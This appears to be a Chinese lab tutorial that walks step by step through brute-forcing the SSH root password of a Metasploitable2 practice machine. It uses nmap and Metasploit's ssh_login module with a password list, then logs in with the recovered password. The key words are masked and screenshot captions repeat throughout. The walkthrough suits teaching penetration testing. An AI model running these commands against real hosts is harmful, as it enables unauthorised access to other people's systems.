ssh弱口令**

时间:2024-03-28 13:49:05

对目标主机的22端口进行弱口令**

环境
kali linux 攻击机
metasploitable2 目标机
步骤
1、 打开终端利用nmap扫描工具对目标主机进行扫描 nmap -sT -v -O 192.168.235.140
ssh弱口令**
可以看到ssh的22号端口是打开着的
2、 输入msfconsole 打开msf的终端窗口,输入search ssh_login
可以看到相关的攻击载荷模块工具
ssh弱口令**
3、 msf终端中输入use auxiliary/scanner/ssh/ssh_login进入该攻击工具
ssh弱口令**
4、 show options 查看有哪些选项yes表示填写的的参数
ssh弱口令**
5、 msf终端中输入set RHOST 添加目标主机地址 set USERNAME root 添加用户登录名
ssh弱口令**
6、 msf终端中输入set PASS_FILE /home/password.txt添加密码字典
ssh弱口令**
7、 终端中输入 set THREADS 20 添加暴力**的线程数为20
ssh弱口令**
8、输入run开始运行该工具进行暴力**
ssh弱口令**
可以看到该目标主机的root用户密码是toor
8、 终端中输入ssh [email protected],登录到主机
ssh弱口令**
可以看到该目标主机的信息
ssh弱口令**